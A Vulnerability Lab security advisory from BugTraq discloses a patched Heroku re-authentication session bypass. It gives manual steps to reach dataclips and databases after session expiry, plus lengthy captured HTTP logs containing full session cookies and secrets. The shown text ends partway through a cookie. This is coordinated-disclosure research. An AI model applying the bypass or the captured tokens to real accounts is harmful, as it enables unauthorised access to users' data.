BugTraq
Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability Jun 10 2015 11:59AM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1323

Video: http://www.vulnerability-lab.com/get_content.php?id=1336

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/06/09/heroku-bug-b
ounty-2015-api-re-auth-session-token-bypass-vulnerability

Release Date:
=============
2015-06-09

Vulnerability Laboratory ID (VL-ID):
====================================
1323

Common Vulnerability Scoring System:
====================================
6.1

Product & Service Introduction:
===============================
Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project.
Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers
without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and
designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps.
Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity.

Heroku (pronounced her-OH-koo) is a cloud application platform â?? a new way of building and deploying web apps. Our service
lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling.
Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins.

(Copy of the Vendor Homepage: https://www.heroku.com/home )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a application-side session validation vulnerability in the official Heroku API and web-application.

Vulnerability Disclosure Timeline:
==================================
2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program)
2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program)
2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team)
2015-06-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Heroku
Product: Heroku Dashboard - Web Application (API) 2014 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service.
The vulnerability allows an attacker to request unauthorized information without the second forced re authentication module.

The heroku web-service provides to all web services an expire session function that disallows to visit the page without re authentication.
The dataclips page session of the editor and the postgres service allows to add for example new context. If the session expires in the main
heroku web-service the user will be forced to login again.

During the tests we releaved that the session of the dataclip service and editor is available even if the re-authentication service is still running.
If the local attacker changes the path manually to request directly the stored context in the profile (like shown in video) he is able to bypass the
security mechanism to add or request the database name.

The session validation mechnism needs to provoke a refresh of the progres datasheet page or the dataclips add through editor to prevent unauthorized
access after a session has been expired during the usage of the heroku service.

The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1.
Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction. Successful exploitation
of the vulnerability results in the evade and bypass of the re-authentication mechanism.

Proof of Concept (PoC):
=======================
The local re auth bypass vulnerability can be exploited by local attackers with low privilege web-application user account or
by remote attackers without privlege web-application account and high user interaction. For security demonstration or to reproduce
the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the re-auth bypass vulnerability ...

1. Register a webpage account at the official heroku website
2. Provoke the re-auth function that pops up after several profile interaction during the time after the session expired
3. When the session is expired to do not press the re-auth function button that popup stable to all service
4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired to all other modules and sites
Note: Even if all session are expired the user is able to request the database and the dataclips in the service without authorization
5. Successful reproduce of the session vulnerability!

Video Demonstration
The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases.
The session expired values also needs to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself.

Exception Message:
-Your session has expired
--Your current session has expired or become inactive and has been terminated.
---Please log in again to continue using Dashboard.

--- PoC Session Logs ---
17:55:32.218[718ms][total 718ms] Status: 303[See Other]
GET https://id.heroku.com/logout Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[id.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://www.heroku.com/home]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8
FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTz
M52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462
aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(refer
ral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22refer
ral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=sqPL2wMwiUxRKRDIZRZpFZtpQVHNL051XZMscTdZzo85hsFiMzwNrL-ZgLL
Cf8llJTtLTk8ilInCKAeHek3hJ971JEcCHKfGmen-xMGjed0pjaT5KG1CKDBB-oPo5z_trM8
eSSBDiLUnva-T9N6Pty3jwbNpxFYeHFG79jB1K1j-lc_-dB8tACasWzQbFPc5d-6ampRWbPJ
f4ZQhglDefQdPrvLEqwO5BD5uXKzT2WKvilkEqdnzzbUKXm3WD1GMWZwqsV6hkeUJMn5vbsV
b32yIm1r7sWL5WxuYMvbTpEdMWcA5mDJzoc0ME_Oo0F4Sz3lhIxBhipySHAYlAiR6B7SQCoc
JGSCqIJckDiQ_cZ5wY8s2hmGAvL2YKGb4gZGLMR2VvJDC8AEOhbS5ofhZDrYTvEaRCFgqweI
3KGFQlcie7C2AQnYFgo7UfnilQsLZEVKAZnJ_f6wy3t9a108LwzUxg5aQ27mYexe5IK3Ei2j
i5BNFcphWiujvrHG4TjtQwtxfF6eZZhTurqM1Rcwle2hPfQqQlSMrEf54dh_nurL6Oyh3mMH
i68mhDZm6zIaAq-GCGpx8PwNhwZ8Wp1ZjmD04fFsPKBZBA9pJ2IMuP5NBgP6dpkPuPa1MxIl
DpPuz6PuK_ONBKPI-ApKey2g6_6r6dHXBZU-dBMAX9nNm16r7rEoJR4StN3ApBazWVxHDTMJ
dprFoMbcAYsUEsjFQBMuNMwe3GKxvFKNynwK-GWsjCxL_BMe8pZQVaW7h-qSZWydA4Pmx9Vm
kTdEZ7e4BXiGXZCUo6et8QyZLK4SfV4tod03s6MkB3nbWjSLEsJyo4KQSDu4jJyqP7g9nvRu
Jz67XHl_pTLcV2updPygb3qrlyeFZLhuXtjsDbpWHMxWjvjhX7g63QkdsCSsytKBOYNsKZu8
npvW59b3U6jO-aB-ZN4hMDbogRSKRhRE1bIrN%7CbHVM61lFujhv41-3Kbdezg%3D%3D%7C9
0aed411ab431962695b4954963c46d29c694c5b89ee793a1654e400d0830070; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; heroku_session=1; heroku_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doe
u1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%
3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411
214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22
%5D]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Date[Sat, 20 Sep 2014 15:55:42 GMT]
Connection[keep-alive]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Content-Type[text/html;charset=utf-8]
Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO
_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2
gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6
D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaS
T7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba200
99c14ed; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure]
Location[https://id.heroku.com/login]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Request-Id[17eefe38-a226-46fc-8e1d-2f673d87db10]
Transfer-Encoding[chunked]
Via[1.1 vegur]

17:55:32.937[159ms][total 818ms] Status: 200[OK]
GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[id.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://www.heroku.com/home]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8
FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTz
M52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462
aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(refer
ral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22refer
ral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO
_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2
gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6
D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaS
T7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba200
99c14ed; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doe
u1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%
3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411
214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22
%5D]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Date[Sat, 20 Sep 2014 15:55:42 GMT]
Connection[keep-alive]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Content-Type[text/html;charset=utf-8]
Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
rack.session=HSkfR06GR1NnxhFxsmBIy0sVnJareQJv2qjGRfPXqF3Dxw-NQDVWTkf5Ixb
kOvB9Z8WGGhGe2f4_P7ZkiWLRnuY_mYbgteaZNCrRtb13u0v7TCQN96dgWRfbP5lSlsLzJ3A
_QBzFn0LtDWiUwv1GIPgmrGvMMRRNm6k7YRgVDF1VUVKLyo4eJ57fFw6kQG6_QeSZXL2pYCn
vRe779I47DXgY-VrPXUbI5Uk9Cznr49pEvkkRfb3QatvMR8el3E8QT6StkYQQEDwzL2ZYJro
QXhHPMa-yHcGVoNATooiumbPXBEOM1a-fKUdJ7s56yZ9l93Ie4fVxLOUtRRtjJd-O7Sg3FLq
diNM7siMYpSD_gxh_XT3hWYbd4h5t9Xoj_zgOtxiDJlM63RchlyCtoFERag%3D%3D%7CFvfX
9eXB36GDcprUj47Nrg%3D%3D%7C3212ecd5bcd6a88fd376d7bd6a58dda06d5de2e01f9b0
66d2dce3e441b8d09b2; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Request-Id[6c5a1418-f70d-4eb5-901c-8b333e82d2e3]
Transfer-Encoding[chunked]
Via[1.1 vegur]

17:56:11.833[437ms][total 437ms] Status: 302[Found]
GET https://postgres.heroku.com/databases Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[postgres.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/clips/new]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8
FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTz
M52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462
aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(refer
ral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22refer
ral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5
OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURT
em9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJo
ak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBG--16c1365df0
4da320c8f856f41afe6b154b068da3; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRk
VnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNr
NE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRP
RTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkG
OgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Connection[close]
Date[Sat, 20 Sep 2014 15:56:22 GMT]
status[302 Found]
Strict-Transport-Security[max-age=99; includeSubdomains]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1]
Location[https://postgres.heroku.com/login]
Content-Type[text/html; charset=utf-8]
x-ua-compatible[IE=Edge,chrome=1]
Cache-Control[no-cache, private]
Set-Cookie[_session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M
2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhN
WZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GO
wBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGS
SIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6
831c4b2a0; path=/; secure; HttpOnly]
x-request-id[3757ef00-dcc8-44e7-9413-c3d1beab8f0d]
x-runtime[0.008472]
x-rack-cache[miss]
Via[1.1 vegur]

17:56:12.273[183ms][total 183ms] Status: 302[Found]
GET https://postgres.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[postgres.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/clips/new]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8
FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTz
M52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462
aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(refer
ral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22refer
ral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5
OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURT
em9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJo
ak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJl
Y3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRk
VnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNr
NE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRP
RTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkG
OgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Connection[close]
Date[Sat, 20 Sep 2014 15:56:22 GMT]
status[302 Found]
Strict-Transport-Security[max-age=99; includeSubdomains]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1]
Location[https://postgres.heroku.com/auth/heroku]
Content-Type[text/html; charset=utf-8]
x-ua-compatible[IE=Edge,chrome=1]
Cache-Control[no-cache, private]
Set-Cookie[user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure
super_user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure
postgres_session_nonce=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure]
x-request-id[aab5515c-db99-4516-afb9-f81c6d7427e3]
x-runtime[0.005907]
x-rack-cache[miss]
Via[1.1 vegur]

17:56:13.046[161ms][total 897ms] Status: 200[OK]
GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[id.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/clips/new]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8
FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTz
M52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462
aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(refer
ral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22refer
ral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=Oj3BV4aM5iZSvASRXbZL38nzvzIIh2T_S6vdquNUi-OZ6JARZBmQ2zTzwbX
j9r1M5TY2tCgCUDV6CmJzJm06aX0EH6gr2QJTjzVd64_n-FlnBUmFFLaDc_gtbPTYX3K8SsD
CHAVVhA75xb6j6bvFqlPk-Ne-848PcKFchgdKGSflzC8_-Wfqqg9hppwmjdb6ia9bKqejpkX
Y49b0ehF8FxQp8s7etE4YxhHhvIzJqxUd3oxBjZo_F2Zoec30Cc6dRuPk5J8bocsC8_8Zq09
DoZFqN_DOG41HDlbKIW1TKUtFLfCvuQ3KoE7cjM7dSdVzZZf7uehizmAGWkBPIWp-fJRoUG3
L2Rpoo0VZdN_ih-BGCtGMNiFb3K4586XR9yQWMuEiikHz1yhZp_fK7oZk60Ps3vTnNi1zGxR
cfW_N3ScLeVLSyHMqefqlqtVMAWqTf5qP5pbBhbPiwJKTnowmmNPx92DrmkqWD0SrdKHOVtc
WrCvwmNW5dzG7zAFQ_BMFAU-1c7BDbIkTSBEI0YuSu48HuLkTAjNPJBuSLXJkj42h1MPsx3V
xz8HakjQxIJt1KirqkcQdZTlPheoKI0iYpi4V27TRMZtrb8AZh9mMtEo435snF2SDhMHSdzn
iCMlA7G-Ngw4EheMslTp5BsqmhIQiy0-hklsUKnMX8Hedh3g%3D%7CwHQzLOXMlHCSl_paZ8
IydQ%3D%3D%7Cc627cc2ac2f61b0720781b7b15c81836840a4546ae4365f68d3c89ffd9d
513d5; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.62.9.1411228524365]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Date[Sat, 20 Sep 2014 15:56:22 GMT]
Connection[keep-alive]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Content-Type[text/html;charset=utf-8]
Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
rack.session=P8zZlFpkxJkI4ZLxjTorLaS7chYJ_xvm3tBRWqep-FyoNj_WSHDck99ggLa
KgLczUMG6QylLu1VbNinWWd2uTvosTC3p811iQmobo8BwOeNgaY-Iyei8yP-c294TzPqzGmi
pSdIDCpCJJNlRu9fNDBgAppjFQi8lwNVmyyVPgwZc1tMa6KBi9Dx9Z6QxGLGykZPfxZvLCXH
anhPgfRdxttpcO4uG-zklXg7kHrAri8MDvjXJbXvXr-BBnkWbr1hPFOH2z7BZXiBvTeKIuB6
N_fqOEredXT8KRwcVGHxoHRFVsBQvr8bFqR8C_ImSzTqpkjjA_32wqf_t8oyVyGRt6Wf2RAj
CO2Ve9nvECAaMhlA0AAChwZ7zPDYErU6WPGumLDLGGQJyeRxB31TPehBownCAIAtyZIBmoBm
nCNRM5t6czeCBR1U7xMTBctVh58lH-0WIE1uESRcFYGiEjrefszmsjtQuv8XOS3i0zqBn4e7
rKe5BQvvm_lWLlDOumVoMa7OKsaV7TuprlYP4n5LpWeOenBxb1JtTY8ASoQzv3rllKfG_LuQ
n0OGHVnCu9BsSd6B9qdZKqNZL1kA2xlt3SKrjt5qgIpLs3Wq4N3H3n5yXCIKduxNkqDFd5bJ
8Ibx1prC44SktuOnv4v9xQaCTtWfw3NI_068iXRGBt0sDnq0%3D%7Cdyw4qNVeN1QJkse0PY
VkMA%3D%3D%7Cf92ff337070c04e0bc1331b08bd2d38420af6bea0707a1ccfc813d4ce3b
89c82; path=/; expires=Mon, 20 Oct 2014 15:56:23 -0000; HttpOnly; secure]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Request-Id[8583828c-b434-43b4-a8a2-9df47b64d82d]
Transfer-Encoding[chunked]
Via[1.1 vegur]

17:56:37.841[603ms][total 603ms] Status: 302[Found]
GET https://dashboard.heroku.com/account Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[dashboard.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8
FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTz
M52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462
aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(refer
ral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22refer
ral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _my-heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIM
WJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJ
WQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZG--af3
7490991f3a343d1126f2e451efbf7744c0f9a; __utmb=148535982.65.9.1411228524365; user_session_secret=BAhJIgKKBWFGcHhTbVkzVUVjeE1TdGxVSGcwWTJ3clRVMTVWWE5p
